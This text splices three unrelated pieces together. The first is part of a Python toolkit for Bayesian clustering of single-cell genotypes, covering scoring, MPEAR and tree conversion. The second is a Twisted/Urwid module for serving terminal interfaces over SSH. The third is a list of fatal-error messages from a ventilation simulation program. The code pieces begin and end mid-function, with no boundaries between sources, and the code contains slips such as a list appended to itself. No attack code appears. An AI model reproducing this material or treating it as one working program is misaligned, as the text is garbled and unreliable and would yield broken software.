''' Check if parameters can be used for a beta function
Arguments:
mean (float): Beta function mean
var (float): Beta function variance
Returns:
bool: True if parameters can be used, False otherwise
'''
return mean > .5 * (1 - (1 - 4 * var) ** .5)
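# e.g. check_beta_params(0.8, 0.1) evaluates to True and check_beta_params(0.2, 0.2)
# to False; note the check appears to enforce only the lower of the two bounds on
# the mean implied by the admissibility condition mean * (1 - mean) > var.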
# ------------------------------------------------------------------------------
# Evaluation functions
# ------------------------------------------------------------------------------
def get_v_measure(pred_clusters, true_clusters, out_file=''):
score = v_measure_score(true_clusters, pred_clusters)
if out_file:
_write_to_file(out_file, score)
return score
def get_ARI(pred_clusters, true_clusters, out_file=''):
score = adjusted_rand_score(true_clusters,pred_clusters)
if out_file:
_write_to_file(out_file, score)
return score
def get_hamming_dist(df_pred, df_true):
if df_true.shape != df_pred.shape:
score = np.count_nonzero(df_pred.round() != df_true.T)
else:
score = np.count_nonzero(df_pred.round() != df_true)
# To catch cases where NxN dataframes got mixed up
score_t = np.count_nonzero(df_pred.round() != df_true.T)
if score_t < score:
score = score_t
return score
def _get_genotype_all(df_in, assign):
df_out = pd.DataFrame(
index=np.arange(df_in.shape[0]), columns=np.arange(len(assign))
)
if df_in.shape == df_out.shape:
return df_in
for cell_id, cl_id in enumerate(assign):
if isinstance(cl_id, tuple):
df_out[cell_id] = df_in[list(cl_id)].max(axis=1)
else:
df_out[cell_id] = df_in[cl_id]
return df_out
def get_dist(assignments):
steps, cells = assignments.shape
dist = np.zeros(np.arange(cells).sum(), dtype=np.int32)
# Sum up Hamming distance between cells for each posterior sample
for assign in assignments:
dist += pdist(np.stack([assign, assign]).T, 'hamming').astype(np.int32)
# Return mean posterior cellwise hamming distance
return dist / steps
def _get_MPEAR(assignments):
dist = get_dist(assignments)
sim = 1 - dist
dist = squareform(dist)
avg_cl_no = np.mean([np.unique(i).size for i in assignments])
n_range = np.arange(max(2, avg_cl_no * 0.2),
min(avg_cl_no * 2.5, assignments.shape[1]), dtype=int)
best_MPEAR = -np.inf
best_assignment = None
for n in n_range:
model = AgglomerativeClustering(
affinity='precomputed', n_clusters=n, linkage='complete'
).fit(dist)
score = _calc_MPEAR(sim, model.labels_)
if score > best_MPEAR:
best_assignment = model.labels_
best_MPEAR = score
return best_assignment
def _calc_MPEAR(pi, c):
# <NAME>., <NAME>. (2009) - Eq. 13
I = 1 - pdist(np.stack([c, c]).T, 'hamming')
I_sum = I.sum()
pi_sum = pi.sum()
index = (I * pi).sum()
expected_index = (I_sum * pi_sum) / binom(c.size, 2)
max_index = .5 * (I_sum + pi_sum)
return (index - expected_index) / (max_index - expected_index)
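# _calc_MPEAR above appears to compute the posterior expected adjusted Rand
# (PEAR) of a candidate clustering `c` against the posterior similarity values
# `pi`; _get_MPEAR then keeps the agglomerative clustering that maximizes it.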
def get_mean_hierarchy_assignment(assignments, params_full):
steps = assignments.shape[0]
assign = _get_MPEAR(assignments)
clusters = np.unique(assign)
params = np.zeros((clusters.size, params_full.shape[2]))
for i, cluster in enumerate(clusters):
cells_cl_idx = assign == cluster
cells = np.nonzero(cells_cl_idx)[0]
other = np.nonzero(~cells_cl_idx)[0]
# Paper - section 2.3: first criteria
if cells.size == 1:
same_cluster = np.ones(steps).astype(bool)
else:
same_cluster = 0 == bn.nansum(
bn.move_std(assignments[:, cells], 2, axis=1), axis=1
)
# Paper - section 2.3: second criteria
cl_ids = assignments[:,cells[0]]
other_cl_id = assignments[:,other]
no_others = [cl_ids[j] not in other_cl_id[j] for j in range(steps)]
# At least criteria 1 fullfilled
if any(same_cluster):
# Both criteria fullfilled in at least 1 posterior sample
if any(same_cluster & no_others):
step_idx = np.argwhere(same_cluster & no_others).flatten()
else:
step_idx = np.argwhere(same_cluster).flatten()
for step in step_idx:
cl_id = np.argwhere(np.unique(assignments[step]) == cl_ids[step]) \
.flatten()[0]
params[i] += params_full[step][cl_id]
params[i] /= step_idx.size
# If not, take parameters from all posterior samples
else:
for step, step_assign in enumerate(assignments):
cl_id_all = np.unique(step_assign)
cl_id, cnt = np.unique(step_assign[cells], return_counts=True)
cl_id_new = np.argwhere(np.in1d(cl_id_all, cl_id)).flatten()
params[i] += np.dot(cnt, params_full[step][cl_id_new])
params[i] /= steps * cells.size
params_df = pd.DataFrame(params).T[assign]
return assign, params_df
def get_latents_posterior(results, data, single_chains=False):
latents = []
if single_chains:
for result in results:
latents.append(_get_latents_posterior_chain(result, data))
else:
result = _concat_chain_results(results)
latents.append(_get_latents_posterior_chain(result, data))
return latents
def _concat_chain_results(results):
assign = np.concatenate([i['assignments'][i['burn_in']:] for i in results])
a = np.concatenate([i['DP_alpha'][i['burn_in']:] for i in results])
ML = np.concatenate([i['ML'][i['burn_in']:] for i in results])
MAP = np.concatenate([i['MAP'][i['burn_in']:] for i in results])
FN = np.concatenate([i['FN'][i['burn_in']:] for i in results])
FP = np.concatenate([i['FP'][i['burn_in']:] for i in results])
# Fill clusters not used by all chains with zeros
params = [i['params'] for i in results]
cl_max = np.max([i.shape[1] for i in params])
for i, par_chain in enumerate(params):
cl_diff = cl_max - par_chain.shape[1]
params[i] = np.pad(par_chain, [(0, 0), (0, cl_diff), (0, 0)])
par = np.concatenate(params)
return {'assignments': assign, 'params': par, 'DP_alpha': a, 'FN': FN,
'FP': FP, 'burn_in': 0, 'ML': ML, 'MAP': MAP}
def _get_latents_posterior_chain(result, data):
burn_in = result['burn_in']
assign, geno = get_mean_hierarchy_assignment(
result['assignments'][burn_in:], result['params']
)
a = _get_posterior_avg(result['DP_alpha'][burn_in:])
FN = _get_posterior_avg(result['FN'][burn_in:])
FP = _get_posterior_avg(result['FP'][burn_in:])
FN_geno = ((geno.T.values.round() == 1) & (data == 0)).sum() \
/ geno.values.round().sum()
FP_geno = ((geno.T.values.round() == 0) & (data == 1)).sum() \
/ (1 - geno.values.round()).sum()
return {'a': a, 'assignment': assign, 'genotypes': geno, 'FN': FN, 'FP': FP,
'FN_geno': FN_geno, 'FP_geno': FP_geno}
def _get_posterior_avg(data):
return np.mean(data), np.std(data)
def get_latents_point(results, est, data, single_chains=False):
latents = []
if single_chains:
for result in results:
latents.append(_get_latents_point_chain(result, est, data))
else:
scores = [np.max(i[est][i['burn_in']:]) for i in results]
best_chain = results[np.argmax(scores)]
latents.append(_get_latents_point_chain(best_chain, est, data))
return latents
def _get_latents_point_chain(result, est, data):
step_no_bi = np.argmax(result[est][result['burn_in']:])
step = step_no_bi + result['burn_in']
# DPMM conc. parameter
a = result['DP_alpha'][step]
FP = result['FP'][step]
FN = result['FN'][step]
assignment = result['assignments'][step].tolist()
cl_names = np.unique(assignment)
geno_all = result['params'][step_no_bi][np.arange(cl_names.size)] # step_no_bi + 1
geno = pd.DataFrame(geno_all, index=cl_names).T[assignment]
FN_geno = ((geno.T.values.round() == 1) & (data == 0)).sum() \
/ geno.values.round().sum()
FP_geno = ((geno.T.values.round() == 0) & (data == 1)).sum() \
/ (1 - geno.values.round()).sum()
return {'step': step, 'a': a, 'assignment': assignment, 'genotypes': geno,
'FN': FN, 'FP': FP, 'FN_geno': FN_geno, 'FP_geno': FP_geno}
def _write_to_file(file, content, attach=False):
if attach and os.path.exists(file):
open_flag = 'a'
else:
open_flag = 'w'
with open(file, open_flag) as f:
f.write(str(content))
def newick_to_gv(in_file, out_file=''):
with open(in_file, 'r') as f:
tree = f.read().strip().rstrip(';')
edges, cells = get_edges_from_newick(tree)
gv_tree = edges_to_gv(edges, cells)
if out_file:
_write_to_file(out_file, gv_tree)
else:
return gv_tree
def get_edges_from_newick(data):
cells = sorted(re.findall(r'\w+cell\d*', data))
for i, cell in enumerate(cells):
data = data.replace(cell, f'C{i}')
edges = []
node_no = len(cells)
while True:
pairs = re.findall(r'\((C\d+):(0.\d+),(C\d+):(0.\d+)\)', data)
if not pairs:
break
for i, pair in enumerate(pairs):
n1, d1, n2, d2 = pair
edges.append((node_no, int(n1.lstrip('C')), float(d1)))
edges.append((node_no, int(n2.lstrip('C')), float(d2)))
data = data.replace('({}:{},{}:{})'.format(*pair), f'C{node_no}')
node_no += 1
return edges, cells
def get_edges_from_gz(data):
mut_edges = []
muts = set([])
cell_edges = []
cells = []
for line in data.split(';\n')[1:-1]:
edge_nodes = re.search(r'(\d+)\s+->\s+(\d+)', line)
attachment_nodes = re.search(r'(\d+)\s+->\s+(s\d+)', line)
single_node = re.search(r'(s?\d+)$', line)
if edge_nodes:
n_from = int(edge_nodes.group(1))
n_to = int(edge_nodes.group(2))
n_from -= 1
n_to -= 1
if n_from != -1 and n_to != -1:
mut_edges.append((n_from, n_to))
muts.update([n_from, n_to])
if attachment_nodes:
n_from = int(attachment_nodes.group(1))
n_to = attachment_nodes.group(2)
n_from -= 1
cell_edges.append((n_from, n_to))
cells.append(n_to)
elif single_node:
node = single_node.group(1)
if node.startswith('s'):
cells.append(cells)
else:
muts.add(int(node) - 1)
return mut_edges, muts, cell_edges, cells
def edges_to_gv(edges, cells):
# GraphViz Header: Node style
out_str = DOT_HEADER
e_length = [i[2] for i in edges]
e_scaled = np.ceil(e_length / np.max(e_length) * (100)).astype(int)
for i, edge in enumerate(edges):
try:
n_to = cells[edge[1]]
except IndexError:
n_to = edge[1]
out_str += '{} -> {} [label="{}"];\n' \
.format(edge[0], n_to, ' ' * e_scaled[i])
out_str += '}'
return out_str
def collapse_cells_on_tree(data_folder, out_file=''):
tree_file = os.path.join(data_folder, 'tree.gv')
with open(tree_file, 'r') as f:
tree_str = f.read()
mut_edges, muts, cell_edges, cells = get_edges_from_gz(tree_str)
cell_edges_collapse = {}
for mut_from, cell_to in cell_edges:
try:
cell_edges_collapse[mut_from].append(cell_to)
except KeyError:
cell_edges_collapse[mut_from] = [cell_to]
# GraphViz Header: Node style
out_str = DOT_HEADER
for mut_edge in mut_edges:
out_str += '{} -> {};\n'.format(*mut_edge)
out_str += DOT_CELLS
i = 0
for mut_from, cells_to in cell_edges_collapse.items():
size = 0.5 + len(cells_to) * 1
out_str += '{f} -> s{t} [label="{s}", size={s}];\n' \
.format(f=mut_from, t=i, s=size)
i += 1
out_str += '}'
if not out_file:
out_file = os.path.join(data_folder, 'tree_collapsed.gv')
_write_to_file(out_file, out_str)
try:
from graphviz import render
render('dot', 'png', out_file)
except ImportError:
pass
def get_lugsail_batch_means_est(data_in, steps=None):
m = len(data_in)
T_iL = []
s_i = []
n_i = []
for data_chain, burnin_chain in data_in:
data = data_chain[burnin_chain:steps]
if data.size < 9: # otherwise b // 3 == 0
return np.inf
# [chapter 2.2 in Vats and Knudson, 2018]
n_ii = data.size
b = int(n_ii ** (1/2)) # Batch size. Alternative: n ** (1/3)
n_i.append(n_ii)
chain_mean = bn.nanmean(data)
T_iL.append(
2 * get_tau_lugsail(b, data, chain_mean) \
- get_tau_lugsail(b // 3, data, chain_mean)
)
| |
"""
Twisted integration for Urwid.
This module allows you to serve Urwid applications remotely over ssh.
The idea is that the server listens as an SSH server, and each connection is
routed by Twisted to urwid, and the urwid UI is routed back to the console.
The concept was a bit of a head-bender for me, but really we are just sending
escape codes and the what-not back to the console over the shell that ssh has
created. This is the same service as provided by the UI components in
twisted.conch.insults.window, except urwid has more features, and seems more
mature.
This module is not highly configurable, and the API is not great, so
don't worry about just using it as an example and copy-pasting.
Process
-------
TODO:
- better gpm tracking: there is no place for os.Popen in a Twisted app I
think.
Copyright: 2010, <NAME> <<EMAIL>>
License: MIT <http://www.opensource.org/licenses/mit-license.php>
Portions Copyright: 2010, <NAME> <<EMAIL>>
Licence: LGPL <http://opensource.org/licenses/lgpl-2.1.php>
"""
from __future__ import print_function
import os
import urwid
from urwid.raw_display import Screen
from zope.interface import Interface, Attribute, implements
from twisted.application.service import Application
from twisted.application.internet import TCPServer
from twisted.cred.portal import Portal
from twisted.conch.interfaces import IConchUser, ISession
from twisted.conch.insults.insults import TerminalProtocol, ServerProtocol
from twisted.conch.manhole_ssh import (ConchFactory, TerminalRealm,
TerminalUser, TerminalSession, TerminalSessionTransport)
from twisted.python.components import Componentized, Adapter
class IUrwidUi(Interface):
"""Toplevel urwid widget
"""
toplevel = Attribute('Urwid Toplevel Widget')
palette = Attribute('Urwid Palette')
screen = Attribute('Urwid Screen')
loop = Attribute('Urwid Main Loop')
def create_urwid_toplevel():
"""Create a toplevel widget.
"""
def create_urwid_mainloop():
"""Create the urwid main loop.
"""
class IUrwidMind(Interface):
ui = Attribute('')
terminalProtocol = Attribute('')
terminal = Attribute('')
checkers = Attribute('')
avatar = Attribute('The avatar')
def push(data):
"""Push data"""
def draw():
"""Refresh the UI"""
class UrwidUi(object):
def __init__(self, urwid_mind):
self.mind = urwid_mind
self.toplevel = self.create_urwid_toplevel()
self.palette = self.create_urwid_palette()
self.screen = TwistedScreen(self.mind.terminalProtocol)
self.loop = self.create_urwid_mainloop()
def create_urwid_toplevel(self):
raise NotImplementedError
def create_urwid_palette(self):
return
def create_urwid_mainloop(self):
evl = urwid.TwistedEventLoop(manage_reactor=False)
loop = urwid.MainLoop(self.toplevel, screen=self.screen,
event_loop=evl,
unhandled_input=self.mind.unhandled_key,
palette=self.palette)
self.screen.loop = loop
loop.run()
return loop
class UnhandledKeyHandler(object):
def __init__(self, mind):
self.mind = mind
def push(self, key):
if isinstance(key, tuple):
pass
else:
f = getattr(self, 'key_%s' % key.replace(' ', '_'), None)
if f is None:
return
else:
return f(key)
def key_ctrl_c(self, key):
self.mind.terminal.loseConnection()
class UrwidMind(Adapter):
implements(IUrwidMind)
cred_checkers = []
ui = None
ui_factory = None
unhandled_key_factory = UnhandledKeyHandler
@property
def avatar(self):
return IConchUser(self.original)
def set_terminalProtocol(self, terminalProtocol):
self.terminalProtocol = terminalProtocol
self.terminal = terminalProtocol.terminal
self.unhandled_key_handler = self.unhandled_key_factory(self)
self.unhandled_key = self.unhandled_key_handler.push
self.ui = self.ui_factory(self)
def push(self, data):
self.ui.screen.push(data)
def draw(self):
self.ui.loop.draw_screen()
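# Minimal usage sketch (assumed; the names MyKeyHandler, MyUi and MyMind are
# illustrative only): application-specific key handling is done by subclassing
# UnhandledKeyHandler with key_<name> methods and pointing a UrwidMind
# subclass at it.
#
#   class MyKeyHandler(UnhandledKeyHandler):
#       def key_q(self, key):
#           # close the SSH session when the user presses 'q'
#           self.mind.terminal.loseConnection()
#
#   class MyMind(UrwidMind):
#       ui_factory = MyUi  # some UrwidUi subclass defining the toplevel widget
#       unhandled_key_factory = MyKeyHandler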
class TwistedScreen(Screen):
"""A Urwid screen which knows about the Twisted terminal protocol that is
driving it.
A Urwid screen is responsible for:
1. Input
2. Output
Input is achieved in normal urwid by passing a list of available readable
file descriptors to the event loop for polling/selecting etc. In the
Twisted situation, this is not necessary because Twisted polls the input
descriptors itself. Urwid allows this by being driven using the main loop
instance's `process_input` method which is triggered on Twisted protocol's
standard `dataReceived` method.
"""
def __init__(self, terminalProtocol):
# We will need these later
self.terminalProtocol = terminalProtocol
self.terminal = terminalProtocol.terminal
Screen.__init__(self)
self.colors = 16
self._pal_escape = {}
self.bright_is_bold = True
self.register_palette_entry(None, 'black', 'white')
urwid.signals.connect_signal(self, urwid.UPDATE_PALETTE_ENTRY,
self._on_update_palette_entry)
# Don't need to wait for anything to start
self._started = True
# Urwid Screen API
def get_cols_rows(self):
"""Get the size of the terminal as (cols, rows)
"""
return self.terminalProtocol.width, self.terminalProtocol.height
    def draw_screen(self, maxres, r):
"""Render a canvas to the terminal.
The canvas contains all the information required to render the Urwid
UI. The content method returns a list of rows as (attr, cs, text)
tuples. This very simple implementation iterates each row and simply
writes it out.
"""
(maxcol, maxrow) = maxres
#self.terminal.eraseDisplay()
lasta = None
for i, row in enumerate(r.content()):
self.terminal.cursorPosition(0, i)
for (attr, cs, text) in row:
if attr != lasta:
text = '%s%s' % (self._attr_to_escape(attr), text)
lasta = attr
#if cs or attr:
# print cs, attr
self.write(text)
cursor = r.get_cursor()
if cursor is not None:
self.terminal.cursorPosition(*cursor)
# XXX from base screen
def set_mouse_tracking(self, enable=True):
"""
Enable (or disable) mouse tracking.
After calling this function get_input will include mouse
click events along with keystrokes.
"""
if enable:
self.write(urwid.escape.MOUSE_TRACKING_ON)
else:
self.write(urwid.escape.MOUSE_TRACKING_OFF)
# twisted handles polling, so we don't need the loop to do it, we just
# push what we get to the loop from dataReceived.
def hook_event_loop(self, event_loop, callback):
self._urwid_callback = callback
self._evl = event_loop
def unhook_event_loop(self, event_loop):
pass
# Do nothing here either. Not entirely sure when it gets called.
def get_input(self, raw_keys=False):
return
def get_available_raw_input(self):
data = self._data
self._data = []
return data
# Twisted driven
def push(self, data):
"""Receive data from Twisted and push it into the urwid main loop.
We must here:
1. filter the input data against urwid's input filter.
2. Calculate escapes and other clever things using urwid's
`escape.process_keyqueue`.
3. Pass the calculated keys as a list to the Urwid main loop.
4. Redraw the screen
"""
self._data = list(map(ord, data))
self.parse_input(self._evl, self._urwid_callback)
self.loop.draw_screen()
# Convenience
def write(self, data):
self.terminal.write(data)
# Private
def _on_update_palette_entry(self, name, *attrspecs):
# copy the attribute to a dictionary containing the escape sequences
self._pal_escape[name] = self._attrspec_to_escape(
attrspecs[{16:0,1:1,88:2,256:3}[self.colors]])
def _attr_to_escape(self, a):
if a in self._pal_escape:
return self._pal_escape[a]
elif isinstance(a, urwid.AttrSpec):
return self._attrspec_to_escape(a)
# undefined attributes use default/default
# TODO: track and report these
return self._attrspec_to_escape(
urwid.AttrSpec('default','default'))
def _attrspec_to_escape(self, a):
"""
Convert AttrSpec instance a to an escape sequence for the terminal
>>> s = Screen()
>>> s.set_terminal_properties(colors=256)
>>> a2e = s._attrspec_to_escape
>>> a2e(s.AttrSpec('brown', 'dark green'))
'\\x1b[0;33;42m'
>>> a2e(s.AttrSpec('#fea,underline', '#d0d'))
'\\x1b[0;38;5;229;4;48;5;164m'
"""
if a.foreground_high:
fg = "38;5;%d" % a.foreground_number
elif a.foreground_basic:
if a.foreground_number > 7:
if self.bright_is_bold:
fg = "1;%d" % (a.foreground_number - 8 + 30)
else:
fg = "%d" % (a.foreground_number - 8 + 90)
else:
fg = "%d" % (a.foreground_number + 30)
else:
fg = "39"
st = "1;" * a.bold + "4;" * a.underline + "7;" * a.standout
if a.background_high:
bg = "48;5;%d" % a.background_number
elif a.background_basic:
if a.background_number > 7:
# this doesn't work on most terminals
bg = "%d" % (a.background_number - 8 + 100)
else:
bg = "%d" % (a.background_number + 40)
else:
bg = "49"
return urwid.escape.ESC + "[0;%s;%s%sm" % (fg, st, bg)
class UrwidTerminalProtocol(TerminalProtocol):
"""A terminal protocol that knows to proxy input and receive output from
Urwid.
    This integrates with the TwistedScreen in a 1:1 relationship.
"""
def __init__(self, urwid_mind):
self.urwid_mind = urwid_mind
self.width = 80
self.height = 24
def connectionMade(self):
self.urwid_mind.set_terminalProtocol(self)
self.terminalSize(self.height, self.width)
def terminalSize(self, height, width):
"""Resize the terminal.
"""
self.width = width
self.height = height
self.urwid_mind.ui.loop.screen_size = None
self.terminal.eraseDisplay()
self.urwid_mind.draw()
def dataReceived(self, data):
"""Received data from the connection.
This overrides the default implementation which parses and passes to
the keyReceived method. We don't do that here, and must not do that so
that Urwid can get the right juice (which includes things like mouse
tracking).
Instead we just pass the data to the screen instance's dataReceived,
which handles the proxying to Urwid.
"""
self.urwid_mind.push(data)
def _unhandled_input(self, input):
# evil
proceed = True
if hasattr(self.urwid_toplevel, 'app'):
proceed = self.urwid_toplevel.app.unhandled_input(self, input)
if not proceed:
return
if input == 'ctrl c':
self.terminal.loseConnection()
class UrwidServerProtocol(ServerProtocol):
def dataReceived(self, data):
self.terminalProtocol.dataReceived(data)
class UrwidUser(TerminalUser):
"""A terminal user that remembers its avatarId
The default implementation doesn't
"""
def __init__(self, original, avatarId):
TerminalUser.__init__(self, original, avatarId)
self.avatarId = avatarId
class UrwidTerminalSession(TerminalSession):
"""A terminal session that remembers the avatar and chained protocol for
later use. And implements a missing method for changed Window size.
Note: This implementation assumes that each SSH connection will only
request a single shell, which is not an entirely safe assumption, but is
by far the most common case.
"""
def openShell(self, proto):
"""Open a shell.
"""
self.chained_protocol = UrwidServerProtocol(
UrwidTerminalProtocol, IUrwidMind(self.original))
TerminalSessionTransport(
proto, self.chained_protocol,
IConchUser(self.original),
self.height, self.width)
def windowChanged(self, dimensions):
"""Called when the window size has changed.
"""
(h, w, x, y) = dimensions
self.chained_protocol.terminalProtocol.terminalSize(h, w)
class UrwidRealm(TerminalRealm):
"""Custom terminal realm class-configured to use our custom Terminal User
Terminal Session.
"""
def __init__(self, mind_factory):
self.mind_factory = mind_factory
def _getAvatar(self, avatarId):
comp = Componentized()
user = UrwidUser(comp, avatarId)
comp.setComponent(IConchUser, user)
sess = UrwidTerminalSession(comp)
comp.setComponent(ISession, sess)
THERMAL SUB-NODES IN THIS SYSTEM HAS EXCEEDED 600.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 180 ********************************************************************************
TRAIN ROUTES MAY NOT PASS THROUGH VENT SHAFTS.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 181 ********************************************************************************
THIS SECTION IS NOT CONNECTED TO THIS NODE.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 182 ********************************************************************************
THE NUMBER OF SECTIONS ATTACHED TO THIS NODE IS INCONSISTENT WITH
THE SYSTEM GEOMETRY DATA.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 183 ********************************************************************************
THE ABOVE NODE HAS NOT BEEN DESCRIBED IN THE NODE DATA.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 184 ********************************************************************************
A MIXING NODE MUST HAVE TWO OR MORE SECTIONS CONNECTED TO IT.
*ERROR* TYPE 185 ********************************************************************************
THE ZONE TYPE MUST BE EITHER 1, 2, OR 3.
*ERROR* TYPE 186 ********************************************************************************
THE ALLOWABLE NUMBER OF SIMULATION ERRORS IS LESS THAN 0 OR GREATER THAN 50.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 187 ********************************************************************************
THE AIR DENSITY GIVEN WITH THE FAN PERFORMANCE CURVE DATA POINTS IS EITHER LESS THAN 0.040 OR
GREATER THAN 0.085 LBS/CUFT.
*ERROR* TYPE 188 ********************************************************************************
THE NUMBER OF ELEMENTS IN THE AERODYNAMIC 'DQ/DT' MATRIX IS GREATER THAN THE PROGRAM CAPACITY.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 189 ********************************************************************************
A SYSTEM WHICH CONTAINS TWO OR MORE INDEPENDENT NETWORKS HAS BEEN ENTERED ('FRAGMENTED NETWORK').
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 190 ********************************************************************************
THE TOTAL LENGTH OF THIS VENTILATION SHAFT IS LESS THAN 10 OR GREATER THAN 2000 FEET.
*ERROR* TYPE 191 ********************************************************************************
A NON-INERTIAL (TYPE 3) ZONE IS NOT CONNECTED TO AN UNCONTROLLED (TYPE 2) ZONE.
*ERROR* TYPE 192 ********************************************************************************
THE AMPLITUDE OF THE ANNUAL TEMPERATURE FLUCTUATION IS LESS THAN 0 OR GREATER THAN 50 DEG F.
*ERROR* TYPE 193 ********************************************************************************
THE FAN LOWER FLOW LIMIT (POINT OF MOTOR BREAKDOWN TORQUE OR STOPPING) ENTERED IS EITHER LESS THAN
-100,000 CFM OR GREATER THAN 0 CFM.
*ERROR* TYPE 194 ********************************************************************************
THE FAN UPPER FLOW LIMIT (POINT OF WINDMILLING) IS EITHER LESS THAN 1000 CFM OR GREATER THAN 2,000,000 CFM.
*ERROR* TYPE 195 ********************************************************************************
A NON-INERTIA VENT SHAFT ZONE (TYPE 3) MUST NOT CONTAIN A LINE SEGMENT.
*ERROR* TYPE 196 ********************************************************************************
A SECTION HAS BEEN ENTERED THAT IS ISOLATED FROM ALL OTHER SECTIONS IN THE NETWORK.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 197 ********************************************************************************
A NETWORK HAVING ONLY ONE OPENING TO THE ATMOSPHERE HAS BEEN DEFINED.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 198 ********************************************************************************
A THERMODYNAMIC TYPE 2 (NON-MIXING) NODE MUST BE AT A 4 OR 5 BRANCH NODE ONLY.
*ERROR* TYPE 199 ********************************************************************************
THE NUMBER OF LOOPS DEFINED BY THE GEOMETRY IS GREATER THAN 500.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 200 ********************************************************************************
THE AVERAGE NUMBER OF SECTIONS ALLOWED PER LOOP HAS BEEN EXCEEDED.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
